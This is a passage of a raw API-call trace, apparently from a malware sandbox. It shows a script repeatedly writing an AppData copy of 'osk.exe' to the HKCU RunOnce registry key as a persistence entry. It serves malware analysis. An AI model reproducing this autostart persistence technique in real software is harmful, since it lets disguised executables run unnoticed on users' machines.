riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.173] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x26 [0081.174] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.174] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x25 [0081.174] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.174] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.174] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.174] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.174] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.175] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.175] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.175] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.175] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.175] RegCloseKey (hKey=0x280) returned 0x0 [0081.175] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.175] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.175] SetTimer (hWnd=0x20280, nIDEvent=0x20a1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a1 [0081.175] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.188] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.188] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.188] KillTimer (hWnd=0x20280, uIDEvent=0x20a1) returned 1 [0081.188] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.188] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.188] IUnknown:Release (This=0x787518) returned 0x1 [0081.188] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.188] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.188] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.189] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.189] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.189] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.189] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.189] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.189] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.189] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x26 [0081.189] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.189] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x27 [0081.189] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.190] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x26 [0081.190] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.190] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.190] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.190] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.190] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.190] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.190] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.190] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.190] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.190] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.191] RegCloseKey (hKey=0x280) returned 0x0 [0081.191] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.191] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.191] SetTimer (hWnd=0x20280, nIDEvent=0x20a2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a2 [0081.191] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.203] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.203] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.204] KillTimer (hWnd=0x20280, uIDEvent=0x20a2) returned 1 [0081.204] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.204] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.204] IUnknown:Release (This=0x787518) returned 0x1 [0081.204] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.204] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.204] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.204] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.204] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.204] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.204] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.204] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.205] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.205] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x27 [0081.205] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.205] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x28 [0081.205] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.205] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x27 [0081.206] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.206] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.206] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.206] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.206] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.206] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.206] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.206] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.206] RegCloseKey (hKey=0x280) returned 0x0 [0081.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.206] SetTimer (hWnd=0x20280, nIDEvent=0x20a3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a3 [0081.207] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.219] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.219] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.219] KillTimer (hWnd=0x20280, uIDEvent=0x20a3) returned 1 [0081.219] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.219] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.219] IUnknown:Release (This=0x787518) returned 0x1 [0081.220] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.220] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.220] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.220] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.220] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.220] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.220] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.220] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.220] 